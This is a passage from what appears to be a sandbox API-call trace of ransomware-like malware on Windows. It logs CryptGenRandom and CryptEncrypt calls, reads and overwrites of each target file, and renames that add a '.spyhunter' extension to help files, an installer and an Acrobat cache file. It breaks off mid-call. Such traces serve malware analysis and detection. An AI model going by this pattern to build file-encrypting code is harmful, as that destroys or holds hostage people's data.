(HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0130.003] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f6e4*=0x14c, lpOverlapped=0x0) returned 1 [0130.004] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.004] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x248f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f6e4*=0x14c, lpOverlapped=0x0) returned 1 [0130.004] GetProcessHeap () returned 0x2c0000 [0130.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0130.004] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.004] WriteFile (in: hFile=0xf0, lpBuffer=0x248f724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6e4, lpOverlapped=0x0 | out: lpBuffer=0x248f724*, lpNumberOfBytesWritten=0x248f6e4*=0x4, lpOverlapped=0x0) returned 1 [0130.004] WriteFile (in: hFile=0xf0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6e4*=0x30, lpOverlapped=0x0) returned 1 [0130.005] CloseHandle (hObject=0xf0) returned 1 [0130.005] GetProcessHeap () returned 0x2c0000 [0130.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0130.005] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.spyhunter") returned 65 [0130.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn.spyhunter")) returned 1 [0130.005] GetProcessHeap () returned 0x2c0000 [0130.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0130.005] GetProcessHeap () returned 0x2c0000 [0130.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.006] GetProcessHeap () returned 0x2c0000 [0130.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2280 | out: hHeap=0x2c0000) returned 1 [0130.006] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f728 | out: pbBuffer=0x248f728) returned 1 [0130.006] GetProcessHeap () returned 0x2c0000 [0130.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.006] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f720*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f720*=0x30) returned 1 [0130.006] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0130.006] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0130.006] StrStrW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0130.006] GetProcessHeap () returned 0x2c0000 [0130.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0130.006] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f6e4*=0x15e, lpOverlapped=0x0) returned 1 [0130.007] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.007] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x248f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f6e4*=0x15e, lpOverlapped=0x0) returned 1 [0130.007] GetProcessHeap () returned 0x2c0000 [0130.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0130.008] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.008] WriteFile (in: hFile=0xf0, lpBuffer=0x248f724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6e4, lpOverlapped=0x0 | out: lpBuffer=0x248f724*, lpNumberOfBytesWritten=0x248f6e4*=0x4, lpOverlapped=0x0) returned 1 [0130.009] WriteFile (in: hFile=0xf0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6e4*=0x30, lpOverlapped=0x0) returned 1 [0130.009] CloseHandle (hObject=0xf0) returned 1 [0130.009] GetProcessHeap () returned 0x2c0000 [0130.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0130.009] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.spyhunter") returned 68 [0130.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn.spyhunter")) returned 1 [0130.010] GetProcessHeap () returned 0x2c0000 [0130.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0130.010] GetProcessHeap () returned 0x2c0000 [0130.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.010] GetProcessHeap () returned 0x2c0000 [0130.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c978 | out: hHeap=0x2c0000) returned 1 [0130.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f720 | out: pbBuffer=0x248f720) returned 1 [0130.010] GetProcessHeap () returned 0x2c0000 [0130.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.011] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f718*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f718*=0x30) returned 1 [0130.011] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0130.011] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0130.011] StrStrW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".txt") returned 0x0 [0130.011] GetProcessHeap () returned 0x2c0000 [0130.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0130.011] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f6dc*=0x146, lpOverlapped=0x0) returned 1 [0130.012] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.012] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x248f6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f6dc*=0x146, lpOverlapped=0x0) returned 1 [0130.012] GetProcessHeap () returned 0x2c0000 [0130.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0130.012] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.012] WriteFile (in: hFile=0xf0, lpBuffer=0x248f71c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6dc, lpOverlapped=0x0 | out: lpBuffer=0x248f71c*, lpNumberOfBytesWritten=0x248f6dc*=0x4, lpOverlapped=0x0) returned 1 [0130.012] WriteFile (in: hFile=0xf0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6dc*=0x30, lpOverlapped=0x0) returned 1 [0130.012] CloseHandle (hObject=0xf0) returned 1 [0130.013] GetProcessHeap () returned 0x2c0000 [0130.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0130.013] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.spyhunter") returned 64 [0130.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn.spyhunter")) returned 1 [0130.013] GetProcessHeap () returned 0x2c0000 [0130.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0130.013] GetProcessHeap () returned 0x2c0000 [0130.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.013] GetProcessHeap () returned 0x2c0000 [0130.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec21c8 | out: hHeap=0x2c0000) returned 1 [0130.014] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f720 | out: pbBuffer=0x248f720) returned 1 [0130.014] GetProcessHeap () returned 0x2c0000 [0130.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f718*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f718*=0x30) returned 1 [0130.014] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0130.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned 54 [0130.014] StrStrW (lpFirst="MS.MSOUC.14.1033.hxn", lpSrch=".txt") returned 0x0 [0130.014] GetProcessHeap () returned 0x2c0000 [0130.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0130.014] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f6dc*=0x146, lpOverlapped=0x0) returned 1 [0130.015] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.015] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x248f6dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f6dc*=0x146, lpOverlapped=0x0) returned 1 [0130.015] GetProcessHeap () returned 0x2c0000 [0130.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0130.015] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.016] WriteFile (in: hFile=0xf0, lpBuffer=0x248f71c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6dc, lpOverlapped=0x0 | out: lpBuffer=0x248f71c*, lpNumberOfBytesWritten=0x248f6dc*=0x4, lpOverlapped=0x0) returned 1 [0130.016] WriteFile (in: hFile=0xf0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6dc*=0x30, lpOverlapped=0x0) returned 1 [0130.016] CloseHandle (hObject=0xf0) returned 1 [0130.016] GetProcessHeap () returned 0x2c0000 [0130.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0130.016] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.spyhunter") returned 64 [0130.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.spyhunter")) returned 1 [0130.017] GetProcessHeap () returned 0x2c0000 [0130.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0130.017] GetProcessHeap () returned 0x2c0000 [0130.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.017] GetProcessHeap () returned 0x2c0000 [0130.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2110 | out: hHeap=0x2c0000) returned 1 [0130.017] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f718 | out: pbBuffer=0x248f718) returned 1 [0130.017] GetProcessHeap () returned 0x2c0000 [0130.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.017] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f710*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f710*=0x30) returned 1 [0130.017] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0130.021] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned 61 [0130.021] StrStrW (lpFirst="MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0130.021] GetProcessHeap () returned 0x2c0000 [0130.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0130.021] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f6d4*=0x170, lpOverlapped=0x0) returned 1 [0130.022] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffe90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.022] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x248f6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f6d4*=0x170, lpOverlapped=0x0) returned 1 [0130.022] GetProcessHeap () returned 0x2c0000 [0130.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0130.022] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.022] WriteFile (in: hFile=0xf4, lpBuffer=0x248f714*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6d4, lpOverlapped=0x0 | out: lpBuffer=0x248f714*, lpNumberOfBytesWritten=0x248f6d4*=0x4, lpOverlapped=0x0) returned 1 [0130.022] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6d4*=0x30, lpOverlapped=0x0) returned 1 [0130.022] CloseHandle (hObject=0xf4) returned 1 [0130.022] GetProcessHeap () returned 0x2c0000 [0130.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0130.022] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.spyhunter") returned 71 [0130.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.spyhunter")) returned 1 [0130.023] GetProcessHeap () returned 0x2c0000 [0130.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0130.023] GetProcessHeap () returned 0x2c0000 [0130.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.023] GetProcessHeap () returned 0x2c0000 [0130.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84f10 | out: hHeap=0x2c0000) returned 1 [0130.023] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f718 | out: pbBuffer=0x248f718) returned 1 [0130.024] GetProcessHeap () returned 0x2c0000 [0130.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f710*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f710*=0x30) returned 1 [0130.024] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0130.058] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0130.058] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".txt") returned 0x0 [0130.058] GetProcessHeap () returned 0x2c0000 [0130.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.058] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f6d4*=0x2800, lpOverlapped=0x0) returned 1 [0130.123] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.123] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f6d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f6d4*=0x2800, lpOverlapped=0x0) returned 1 [0130.124] GetProcessHeap () returned 0x2c0000 [0130.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.124] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.124] WriteFile (in: hFile=0x17c, lpBuffer=0x248f714*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6d4, lpOverlapped=0x0 | out: lpBuffer=0x248f714*, lpNumberOfBytesWritten=0x248f6d4*=0x4, lpOverlapped=0x0) returned 1 [0130.174] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6d4*=0x30, lpOverlapped=0x0) returned 1 [0130.174] CloseHandle (hObject=0x17c) returned 1 [0130.175] GetProcessHeap () returned 0x2c0000 [0130.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0130.175] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.spyhunter") returned 98 [0130.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.spyhunter" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.spyhunter")) returned 1 [0130.177] GetProcessHeap () returned 0x2c0000 [0130.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0130.177] GetProcessHeap () returned 0x2c0000 [0130.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.177] GetProcessHeap () returned 0x2c0000 [0130.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eafcb8 | out: hHeap=0x2c0000) returned 1 [0130.179] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f710 | out: pbBuffer=0x248f710) returned 1 [0130.179] GetProcessHeap () returned 0x2c0000 [0130.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.179] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f708*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f708*=0x30) returned 1 [0130.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0130.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst") returned 86 [0130.184] StrStrW (lpFirst="AcroFnt10.lst", lpSrch=".txt") returned 0x0 [0130.184] GetProcessHeap () returned 0x2c0000 [0130.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0130.184] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f6cc*=0x2800, lpOverlapped=0x0) returned 1 [0130.220] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.220] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f6cc*=0x2800, lpOverlapped=0x0) returned 1 [0130.221] GetProcessHeap () returned 0x2c0000 [0130.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0130.221] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.221] WriteFile (in: hFile=0x17c, lpBuffer=0x248f70c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6cc, lpOverlapped=0x0 | out: lpBuffer=0x248f70c*, lpNumberOfBytesWritten=0x248f6cc*=0x4, lpOverlapped=0x0) returned 1 [0130.228] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, 